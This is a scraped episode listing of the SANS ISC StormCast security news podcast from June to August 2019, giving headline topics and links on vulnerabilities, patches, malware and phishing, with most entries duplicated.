8/6/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, August 6th 2019

Sexploitation E-Mail: Where did the winnings go https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money+The+Final+Chapter/25204/ VMWare Update https://www.vmware.com/security/advisories/VMSA-2019-0012.html Android Update Fixes Qualcom Bug https://source.android.com/security/bulletin/2019-08-01.html https://blade.tencent.com/en/advisories/qualpwn/
8/6/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, August 5th 2019

Misconfigured JIRA Leaks User Details https://medium.com/@logicbomb_1/one-misconfig-jira-to-leak-them-all-including-nasa-and-hundreds-of-fortune-500-companies-a70957ef03c7 Google, Amazon, Apple modify policy on listening in on Assistant Recordings https://datenschutz-hamburg.de/assets/pdf/2019-08-01_press-release-Google_Assistant.pdf https://www.bloomberg.com/news/articles/2019-08-02/amazon-gives-option-to-disable-human-review-of-alexa-recordings https://www.theverge.com/2019/8/2/20751270/apple-stops-contractors-siri-voice-recordings-privacy-opt-out https://www.blog.google/products/assistant/more-information-about-our-processes-safeguard-speech-data/ NVidia Updates https://nvidia.custhelp.com/app/answers/detail/a_id/4841/kw/Security%20Bulletin Detecting Incognito Mode in Google Chrome 76 https://blog.jse.li/posts/chrome-76-incognito-filesystem-timing/
8/5/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, August 5th 2019

Misconfigured JIRA Leaks User Details https://medium.com/@logicbomb_1/one-misconfig-jira-to-leak-them-all-including-nasa-and-hundreds-of-fortune-500-companies-a70957ef03c7 Google, Amazon, Apple modify policy on listening in on Assistant Recordings https://datenschutz-hamburg.de/assets/pdf/2019-08-01_press-release-Google_Assistant.pdf https://www.bloomberg.com/news/articles/2019-08-02/amazon-gives-option-to-disable-human-review-of-alexa-recordings https://www.theverge.com/2019/8/2/20751270/apple-stops-contractors-siri-voice-recordings-privacy-opt-out https://www.blog.google/products/assistant/more-information-about-our-processes-safeguard-speech-data/ NVidia Updates https://nvidia.custhelp.com/app/answers/detail/a_id/4841/kw/Security%20Bulletin Detecting Incognito Mode in Google Chrome 76 https://blog.jse.li/posts/chrome-76-incognito-filesystem-timing/
8/5/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, August 2nd 2019

What Is Listening On Port 9527/TCP https://isc.sans.edu/forums/diary/What+is+Listening+On+Port+9527TCP/25194/ PowerShell Empire Abandonded https://github.com/EmpireProject/Empire https://twitter.com/xorrior/status/1156626182978383874 Cryptomining via GitHub/PasteBin C&C https://unit42.paloaltonetworks.com/rockein-the-netflow/
8/2/20195 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, August 2nd 2019

What Is Listening On Port 9527/TCP https://isc.sans.edu/forums/diary/What+is+Listening+On+Port+9527TCP/25194/ PowerShell Empire Abandonded https://github.com/EmpireProject/Empire https://twitter.com/xorrior/status/1156626182978383874 Cryptomining via GitHub/PasteBin C&C https://unit42.paloaltonetworks.com/rockein-the-netflow/
8/2/20195 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, August 1st 2019

Phishing Attack Targeting Financial Sector https://isc.sans.edu/forums/diary/Targeted+Phishing+Attacks+in+the+Financial+Industry+Fire3+Phishing+Kit/25188/ Enterprise Software Phoneing Home https://www.extrahop.com/company/press-releases/2019/extrahop-issues-warning-about-phoning-home/ Google Stripping www and https again https://bugs.chromium.org/p/chromium/issues/detail?id=883038#c114 Bypassing VISA Contactless Limits https://www.ptsecurity.com/ww-en/about/news/visa-card-vulnerability-can-bypass-contactless-limits/
8/1/20196 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, August 1st 2019

Phishing Attack Targeting Financial Sector https://isc.sans.edu/forums/diary/Targeted+Phishing+Attacks+in+the+Financial+Industry+Fire3+Phishing+Kit/25188/ Enterprise Software Phoneing Home https://www.extrahop.com/company/press-releases/2019/extrahop-issues-warning-about-phoning-home/ Google Stripping www and https again https://bugs.chromium.org/p/chromium/issues/detail?id=883038#c114 Bypassing VISA Contactless Limits https://www.ptsecurity.com/ww-en/about/news/visa-card-vulnerability-can-bypass-contactless-limits/
8/1/20196 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, July 31st 2019

Luno Phishing E-Mail and Badly Implemented 2FA https://isc.sans.edu/forums/diary/Can+You+Spell+2FA+A+Luno+Phish+Example/25186/ Google Chrome Update https://w3c.github.io/webappsec-fetch-metadata/ https://chromereleases.googleblog.com/2019/07/stable-channel-update-for-desktop_30.html Apple Re-Releases 2019-004 Security Update for Sierra/High Sierra https://support.apple.com/en-us/HT210348 Disabling Server Side Recording of Apple Siri Commands https://github.com/jankais3r/Siri-NoLoggingPLS
7/31/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, July 31st 2019

Luno Phishing E-Mail and Badly Implemented 2FA https://isc.sans.edu/forums/diary/Can+You+Spell+2FA+A+Luno+Phish+Example/25186/ Google Chrome Update https://w3c.github.io/webappsec-fetch-metadata/ https://chromereleases.googleblog.com/2019/07/stable-channel-update-for-desktop_30.html Apple Re-Releases 2019-004 Security Update for Sierra/High Sierra https://support.apple.com/en-us/HT210348 Disabling Server Side Recording of Apple Siri Commands https://github.com/jankais3r/Siri-NoLoggingPLS
7/31/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, July 30th 2019

11 Flaws in VxWorks IPNet TCP/IP Stack https://go.armis.com/urgent11 iOS iMessage File Disclosure Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
7/30/20196 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, July 30th 2019

11 Flaws in VxWorks IPNet TCP/IP Stack https://go.armis.com/urgent11 iOS iMessage File Disclosure Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
7/30/20196 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, July 29th 2019

DVRIP Port 34567 Uptick https://isc.sans.edu/forums/diary/DVRIP+Port+34567+Uptick/25174/ LibreOffice LibreLogo Macro Python Code Injection https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/ Extracting Private Key From Amazon Music Application https://koen.io/2019/07/26/underscoring-the-private-in-private-key/
7/29/20197 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, July 29th 2019

DVRIP Port 34567 Uptick https://isc.sans.edu/forums/diary/DVRIP+Port+34567+Uptick/25174/ LibreOffice LibreLogo Macro Python Code Injection https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/ Extracting Private Key From Amazon Music Application https://koen.io/2019/07/26/underscoring-the-private-in-private-key/
7/29/20197 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, July 26th 2019

When Users Attack: Users and Admins Thwarting Security Controls https://isc.sans.edu/forums/diary/When+Users+Attack+Users+and+Admins+Thwarting+Security+Controls/25170/ Immunity's Canvas Now Includes BlueKeep Exploit https://twitter.com/Immunityinc/status/1153752470130221057 Johannesburg Power Outages Due To Ransomware https://twitter.com/CityofJoburgZA https://www.theregister.co.uk/2019/07/25/johannesburg_ransomware_infection/ Darkmatter Intermediate Certificate Trust Removed From Google Chrome https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/7-oKhDBLetQ
7/26/20196 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, July 26th 2019

When Users Attack: Users and Admins Thwarting Security Controls https://isc.sans.edu/forums/diary/When+Users+Attack+Users+and+Admins+Thwarting+Security+Controls/25170/ Immunity's Canvas Now Includes BlueKeep Exploit https://twitter.com/Immunityinc/status/1153752470130221057 Johannesburg Power Outages Due To Ransomware https://twitter.com/CityofJoburgZA https://www.theregister.co.uk/2019/07/25/johannesburg_ransomware_infection/ Darkmatter Intermediate Certificate Trust Removed From Google Chrome https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/7-oKhDBLetQ
7/26/20196 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, July 25th 2019

VLC not Vulnerable to libebml Vulnerablity https://threader.app/thread/1153963312981389312 Cryptominer With BlueKeep Scanner https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/ Elasticsearch Vulnerabilities used to install DDoS Bot https://blog.trendmicro.com/trendlabs-security-intelligence/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databases-into-ddos-botnet-zombies/ May People Be Considered As IOC? https://isc.sans.edu/forums/diary/May+People+Be+Considered+as+IOC/25166/
7/25/20195 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, July 25th 2019

VLC not Vulnerable to libebml Vulnerablity https://threader.app/thread/1153963312981389312 Cryptominer With BlueKeep Scanner https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/ Elasticsearch Vulnerabilities used to install DDoS Bot https://blog.trendmicro.com/trendlabs-security-intelligence/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databases-into-ddos-botnet-zombies/ May People Be Considered As IOC? https://isc.sans.edu/forums/diary/May+People+Be+Considered+as+IOC/25166/
7/25/20195 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, July 24th 2019

TLS Configuration https://isc.sans.edu/forums/diary/Verifying+SSLTLS+configuration+part+1/25162/ https://www.sans.org/webcasts/beast-poodle-celebrating-sweet32-111400 Apple Updates Everything https://support.apple.com/en-us/HT201222 QNAP/Synology Update Security Advise https://www.qnap.com/en-us/security-advisory/nas-201907-11 https://www.facebook.com/synologydeutschland/photos/a.1594837477441905/2417134061878905/ New Bluekeep Writeup https://github.com/0xeb-bp/bluekeep
7/24/20196 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, July 24th 2019

TLS Configuration https://isc.sans.edu/forums/diary/Verifying+SSLTLS+configuration+part+1/25162/ https://www.sans.org/webcasts/beast-poodle-celebrating-sweet32-111400 Apple Updates Everything https://support.apple.com/en-us/HT201222 QNAP/Synology Update Security Advise https://www.qnap.com/en-us/security-advisory/nas-201907-11 https://www.facebook.com/synologydeutschland/photos/a.1594837477441905/2417134061878905/ New Bluekeep Writeup https://github.com/0xeb-bp/bluekeep
7/24/20196 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, July 23rd 2019

Analyzing Compressed PowerShell Scripts https://isc.sans.edu/forums/diary/Analyzing+Compressed+PowerShell+Scripts/25158/ PaloAlto GlobalProtect PreAuth RCE http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html Fortinet Vulnerability https://fortiguard.com/psirt/FG-IR-19-144 ProFTPd Permission Bypass Vulnerability https://tbspace.de/cve201912815proftpd.html
7/23/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, July 23rd 2019

Analyzing Compressed PowerShell Scripts https://isc.sans.edu/forums/diary/Analyzing+Compressed+PowerShell+Scripts/25158/ PaloAlto GlobalProtect PreAuth RCE http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html Fortinet Vulnerability https://fortiguard.com/psirt/FG-IR-19-144 ProFTPd Permission Bypass Vulnerability https://tbspace.de/cve201912815proftpd.html
7/23/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, July 22nd 2019

PHP Malware https://isc.sans.edu/forums/diary/Malicious+PHP+Script+Back+on+Stage/25148/ Drupal Vulnerabilities https://www.drupal.org/sa-core-2019-008 iNSYNQ Breach https://www.insynq.com/support/#status
7/22/20196 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, July 22nd 2019

PHP Malware https://isc.sans.edu/forums/diary/Malicious+PHP+Script+Back+on+Stage/25148/ Drupal Vulnerabilities https://www.drupal.org/sa-core-2019-008 iNSYNQ Breach https://www.insynq.com/support/#status
7/22/20196 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, July 19th 2019

802.1x Tips https://isc.sans.edu/forums/diary/The+Other+Side+of+Critical+Control+1+8021x+Wired+Network+Access+Controls/25146/ Kazachstan TLS Interception https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wnuKAhACo3E/cpsvHgcuDwAJ BEC Trends https://www.fincen.gov/sites/default/files/shared/FinCEN_Financial_Trend_Analysis_FINAL_508.pdf Cyclance Weakness https://skylightcyber.com/2019/07/18/cylance-i-kill-you/
7/19/20197 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, July 19th 2019

802.1x Tips https://isc.sans.edu/forums/diary/The+Other+Side+of+Critical+Control+1+8021x+Wired+Network+Access+Controls/25146/ Kazachstan TLS Interception https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wnuKAhACo3E/cpsvHgcuDwAJ BEC Trends https://www.fincen.gov/sites/default/files/shared/FinCEN_Financial_Trend_Analysis_FINAL_508.pdf Cyclance Weakness https://skylightcyber.com/2019/07/18/cylance-i-kill-you/
7/19/20197 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, July 18th 2019

Analysis of DNS TXT Records https://isc.sans.edu/forums/diary/Analyzis+of+DNS+TXT+Records/25142/ Evil Gnome Linux Malware https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/ New American Express Phishing Attacks https://cofense.com/phishing-attacker-takes-american-express-victims-credentials/
7/18/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, July 18th 2019

Analysis of DNS TXT Records https://isc.sans.edu/forums/diary/Analyzis+of+DNS+TXT+Records/25142/ Evil Gnome Linux Malware https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/ New American Express Phishing Attacks https://cofense.com/phishing-attacker-takes-american-express-victims-credentials/
7/18/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, July 17th 2019

Zoom/Apple Patches Additional Software https://www.theverge.com/2019/7/16/20696529/apple-mac-silent-update-zoom-ringcentral-zhumu-vulnerabilty-patched Lenovo/IOMega NAS API Vulnerability https://www.theregister.co.uk/2019/07/16/iomega_nas_boxes/ Amadeus Vulnerability Allows Access to Boarding Passes https://www.7elements.co.uk/resources/technical-advisories/insecure-direct-object-reference-within-amadeus-check-in-application/ FBI Releases GandGrab Master Keys https://www.documentcloud.org/documents/6199678-GandCrab-Master-Decryption-Keys-FLASH.html Android Media File Jacking https://www.symantec.com/blogs/expert-perspectives/symantec-mobile-threat-defense-attackers-can-manipulate-your-whatsapp-and-telegram-media
7/17/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, July 17th 2019

Zoom/Apple Patches Additional Software https://www.theverge.com/2019/7/16/20696529/apple-mac-silent-update-zoom-ringcentral-zhumu-vulnerabilty-patched Lenovo/IOMega NAS API Vulnerability https://www.theregister.co.uk/2019/07/16/iomega_nas_boxes/ Amadeus Vulnerability Allows Access to Boarding Passes https://www.7elements.co.uk/resources/technical-advisories/insecure-direct-object-reference-within-amadeus-check-in-application/ FBI Releases GandGrab Master Keys https://www.documentcloud.org/documents/6199678-GandCrab-Master-Decryption-Keys-FLASH.html Android Media File Jacking https://www.symantec.com/blogs/expert-perspectives/symantec-mobile-threat-defense-attackers-can-manipulate-your-whatsapp-and-telegram-media
7/17/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, July 16th 2019

isodump.py and malicious ISO files https://isc.sans.edu/forums/diary/isodumppy+and+Malicious+ISO+Files/25134/ Atlassian Crowd Vulnerability Details https://www.corben.io/atlassian-crowd-rce/ Scrapy Vulnerabilities https://medium.com/alertot/web-scraping-considered-dangerous-leaking-files-from-the-spiders-host-bd508f81d498 iOS URL Scheme Susceptible to Hijacking https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/
7/16/20196 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, July 16th 2019

isodump.py and malicious ISO files https://isc.sans.edu/forums/diary/isodumppy+and+Malicious+ISO+Files/25134/ Atlassian Crowd Vulnerability Details https://www.corben.io/atlassian-crowd-rce/ Scrapy Vulnerabilities https://medium.com/alertot/web-scraping-considered-dangerous-leaking-files-from-the-spiders-host-bd508f81d498 iOS URL Scheme Susceptible to Hijacking https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/
7/16/20196 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, July 15th 2019

Magecart Targets S3 Buckets https://www.riskiq.com/blog/labs/magecart-amazon-s3-buckets/ Atlassian Jira Vulnerability https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html Microsoft to Detect Phishing in Forms https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=52927 Tracking Anonymized Bluetooth Devices https://petsymposium.org/2019/files/papers/issue3/popets-2019-0036.pdf
7/15/20196 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, July 15th 2019

Magecart Targets S3 Buckets https://www.riskiq.com/blog/labs/magecart-amazon-s3-buckets/ Atlassian Jira Vulnerability https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html Microsoft to Detect Phishing in Forms https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=52927 Tracking Anonymized Bluetooth Devices https://petsymposium.org/2019/files/papers/issue3/popets-2019-0036.pdf
7/15/20196 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, July 12th 2019

Analysis of a Recent AZORult Sample https://isc.sans.edu/forums/diary/Recent+AZORult+activity/25120/ Apple Delete Zoom Web Server https://www.macrumors.com/2019/07/10/apple-update-remove-zoom-server/ Apple Disables Walkie Talkie App https://techcrunch.com/2019/07/10/apple-disables-walkie-talkie-app-due-to-vulnerability-that-could-allow-iphone-eavesdropping/ Windows PXE Devices May Fail to Boot After Recent Update https://support.microsoft.com/en-in/help/4512816/devices-that-start-up-using-preboot-execution-environment-pxe-images-f Sean Goodwin: Attackers Inside the WAlls: Detecting Malicious Activity https://www.sans.org/reading-room/whitepapers/detection/paper/39055
7/12/201913 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, July 12th 2019

Analysis of a Recent AZORult Sample https://isc.sans.edu/forums/diary/Recent+AZORult+activity/25120/ Apple Delete Zoom Web Server https://www.macrumors.com/2019/07/10/apple-update-remove-zoom-server/ Apple Disables Walkie Talkie App https://techcrunch.com/2019/07/10/apple-disables-walkie-talkie-app-due-to-vulnerability-that-could-allow-iphone-eavesdropping/ Windows PXE Devices May Fail to Boot After Recent Update https://support.microsoft.com/en-in/help/4512816/devices-that-start-up-using-preboot-execution-environment-pxe-images-f Sean Goodwin: Attackers Inside the WAlls: Detecting Malicious Activity https://www.sans.org/reading-room/whitepapers/detection/paper/39055
7/12/201913 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, July 11th 2019

Samba Project Disabling SMBv1 By Default https://isc.sans.edu/forums/diary/Samba+Project+tells+us+Whats+New+SMBv1+Disabled+by+Default+finally/25116/ GnuPG Will No Longer Import Signatures From Keyservers https://lists.gnupg.org/pipermail/gnupg-announce/2019q3/000439.html eChOraix Ransomware https://www.anomali.com/blog/the-ech0raix-ransomware
7/11/20195 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, July 11th 2019

Samba Project Disabling SMBv1 By Default https://isc.sans.edu/forums/diary/Samba+Project+tells+us+Whats+New+SMBv1+Disabled+by+Default+finally/25116/ GnuPG Will No Longer Import Signatures From Keyservers https://lists.gnupg.org/pipermail/gnupg-announce/2019q3/000439.html eChOraix Ransomware https://www.anomali.com/blog/the-ech0raix-ransomware
7/11/20195 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, July 10th 2019

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/MSFT+July+2019+Patch+Tuesday/25110/ Adobe Updates https://helpx.adobe.com/security.html Zoom Vulnerability https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5
7/10/20196 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, July 10th 2019

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/MSFT+July+2019+Patch+Tuesday/25110/ Adobe Updates https://helpx.adobe.com/security.html Zoom Vulnerability https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5
7/10/20196 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, July 9th 2019

Canonical Github Hack https://news.ycombinator.com/item?id=20373009 New Wave of Magecart Attacks https://gist.github.com/gwillem/5d936f5a84837d5c1dcb488ce256294a Facebook's Libra Crpto Currency Already Impersonated https://www.digitalshadows.com/blog-and-research/facebooks-libra-cryptocurrency-cybercriminals-tipping-the-scales-in-their-favor/
7/9/20195 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, July 9th 2019

Canonical Github Hack https://news.ycombinator.com/item?id=20373009 New Wave of Magecart Attacks https://gist.github.com/gwillem/5d936f5a84837d5c1dcb488ce256294a Facebook's Libra Crpto Currency Already Impersonated https://www.digitalshadows.com/blog-and-research/facebooks-libra-cryptocurrency-cybercriminals-tipping-the-scales-in-their-favor/
7/9/20195 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, July 8th 2019

Does "Godlua" Use DNS over HTTPS or Not? https://www.golem.de/news/verschluesseltes-dns-falschmeldung-in-propagandaschlacht-um-dns-ueber-https-1907-142358.html https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/ Exploit for Cisco Authentication Bypass and RCE https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-dcnm-rce.txt Magento RCE Exploit https://blog.ripstech.com/2019/magento-rce-via-xss/ Malicous XSL Files https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098/
7/8/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, July 8th 2019

Does "Godlua" Use DNS over HTTPS or Not? https://www.golem.de/news/verschluesseltes-dns-falschmeldung-in-propagandaschlacht-um-dns-ueber-https-1907-142358.html https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/ Exploit for Cisco Authentication Bypass and RCE https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-dcnm-rce.txt Magento RCE Exploit https://blog.ripstech.com/2019/magento-rce-via-xss/ Malicous XSL Files https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098/
7/8/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, July 3rd 2019

Zipato SmartHub Vulnerabilities https://blackmarble.sh/zipato-smart-hub/ Blocking DNS over HTTPS https://github.com/bambenek/block-doh Cloudflare Outage https://www.cloudflarestatus.com/incidents/tx4pgxs6zxdr Android Update https://source.android.com/security/bulletin/2019-07-01 Powershell Kill Switch Commands https://isc.sans.edu/forums/diary/Using+Powershell+in+Basic+Incident+Response+A+Domain+Wide+KillSwitch/25088/
7/3/20196 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, July 3rd 2019

Zipato SmartHub Vulnerabilities https://blackmarble.sh/zipato-smart-hub/ Blocking DNS over HTTPS https://github.com/bambenek/block-doh Cloudflare Outage https://www.cloudflarestatus.com/incidents/tx4pgxs6zxdr Android Update https://source.android.com/security/bulletin/2019-07-01 Powershell Kill Switch Commands https://isc.sans.edu/forums/diary/Using+Powershell+in+Basic+Incident+Response+A+Domain+Wide+KillSwitch/25088/
7/3/20196 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, July 2nd 2019

Maldoc Payloads in User Forms https://isc.sans.edu/forums/diary/Maldoc+Payloads+in+User+Forms/25084/ Zyxel Vulnerabilities https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml AMD SEV DH Key Recovery https://seclists.org/fulldisclosure/2019/Jun/46 Card Enrollment Service Fraud https://www.advanced-intel.com/post/card-enrollment-services-highly-effective-fraud-methodology-offered-in-russian-underground
7/2/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, July 2nd 2019

Maldoc Payloads in User Forms https://isc.sans.edu/forums/diary/Maldoc+Payloads+in+User+Forms/25084/ Zyxel Vulnerabilities https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml AMD SEV DH Key Recovery https://seclists.org/fulldisclosure/2019/Jun/46 Card Enrollment Service Fraud https://www.advanced-intel.com/post/card-enrollment-services-highly-effective-fraud-methodology-offered-in-russian-underground
7/2/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Sunday, June 30th 2019

Collecting Hashes of Running Processes and verifying them with Virustotal Domain wide https://isc.sans.edu/forums/diary/Verifying+Running+Processes+against+VirusTotal+DomainWide/25078/ Mozilla Server Side TLS Guide Updates https://wiki.mozilla.org/Security/Server_Side_TLS SKS Keyserver DoS Attack https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f QR Code Phishing https://cofense.com/radar-phishing-using-qr-codes-evade-url-analysis/
6/30/20196 minutes, 43 seconds
Episode Artwork

ISC StormCast for Sunday, June 30th 2019

Collecting Hashes of Running Processes and verifying them with Virustotal Domain wide https://isc.sans.edu/forums/diary/Verifying+Running+Processes+against+VirusTotal+DomainWide/25078/ Mozilla Server Side TLS Guide Updates https://wiki.mozilla.org/Security/Server_Side_TLS SKS Keyserver DoS Attack https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f QR Code Phishing https://cofense.com/radar-phishing-using-qr-codes-evade-url-analysis/
6/30/20196 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, June 28th 2019

New Brickerbot (Silex) Sightings https://twitter.com/_larry0/status/1143532888538984448 Supply Chain Attacks Against Telco Providers https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers GreenFlash Sundown Malwaretising Campaign https://blog.malwarebytes.com/threat-analysis/2019/06/greenflash-sundown-exploit-kit-expands-via-large-malvertising-campaign/ TrackThis Demonstrates How Advertisers Track You https://trackthis.link Geoff Parker: Automating Phsh Reporting Resposne http://www.sans.org/reading-room/whitepapers/email/automating-response-phish-reporting-39000
6/27/201916 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, June 28th 2019

New Brickerbot (Silex) Sightings https://twitter.com/_larry0/status/1143532888538984448 Supply Chain Attacks Against Telco Providers https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers GreenFlash Sundown Malwaretising Campaign https://blog.malwarebytes.com/threat-analysis/2019/06/greenflash-sundown-exploit-kit-expands-via-large-malvertising-campaign/ TrackThis Demonstrates How Advertisers Track You https://trackthis.link Geoff Parker: Automating Phsh Reporting Resposne http://www.sans.org/reading-room/whitepapers/email/automating-response-phish-reporting-39000
6/27/201916 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, June 26th 2019

Rig Exploit Kit Installs Pitou.B. Trojan https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+sends+PitouB+Trojan/25068/ AWS VPC Traffic Mirroring https://aws.amazon.com/blogs/aws/new-vpc-traffic-mirroring Elastic SIEM App https://www.elastic.co/blog/introducing-elastic-siem National Emergency Alerts Potentially Vulnerable to Attack https://www.colorado.edu/today/2019/06/11/emergency-alerts
6/25/20195 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, June 26th 2019

Rig Exploit Kit Installs Pitou.B. Trojan https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+sends+PitouB+Trojan/25068/ AWS VPC Traffic Mirroring https://aws.amazon.com/blogs/aws/new-vpc-traffic-mirroring Elastic SIEM App https://www.elastic.co/blog/introducing-elastic-siem National Emergency Alerts Potentially Vulnerable to Attack https://www.colorado.edu/today/2019/06/11/emergency-alerts
6/25/20195 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, June 25th 2019

Cloudflare Outage https://blog.cloudflare.com/how-verizon-and-a-bgp-optimizer-knocked-large-parts-of-the-internet-offline-today/ https://isc.sans.edu/forums/diary/Extensive+BGP+Issues+Affecting+Cloudflare+and+possibly+others/25064/ WeTransfer Misdirects Files https://betanews.com/2019/06/21/wetransfer-fail/ Jenkins Pillage https://dolosgroup.io/blog/2019/6/20/pillaging-the-jenkins-treasure-chest
6/24/20197 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, June 25th 2019

Cloudflare Outage https://blog.cloudflare.com/how-verizon-and-a-bgp-optimizer-knocked-large-parts-of-the-internet-offline-today/ https://isc.sans.edu/forums/diary/Extensive+BGP+Issues+Affecting+Cloudflare+and+possibly+others/25064/ WeTransfer Misdirects Files https://betanews.com/2019/06/21/wetransfer-fail/ Jenkins Pillage https://dolosgroup.io/blog/2019/6/20/pillaging-the-jenkins-treasure-chest
6/24/20197 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, June 24th 2019

SSH Will Start Encrypting Secret Keys in Memory https://marc.info/?l=openbsd-cvs&m=156109087822676&w=2 Bluekeep Patchrate at 83.4% https://twitter.com/RavivTamir/status/1141788586922119168 Android ADB/SSH Botnet https://www.bleepingcomputer.com/news/security/botnet-uses-ssh-and-adb-to-create-android-cryptomining-army/
6/23/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, June 24th 2019

SSH Will Start Encrypting Secret Keys in Memory https://marc.info/?l=openbsd-cvs&m=156109087822676&w=2 Bluekeep Patchrate at 83.4% https://twitter.com/RavivTamir/status/1141788586922119168 Android ADB/SSH Botnet https://www.bleepingcomputer.com/news/security/botnet-uses-ssh-and-adb-to-create-android-cryptomining-army/
6/23/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, June 21st 2019

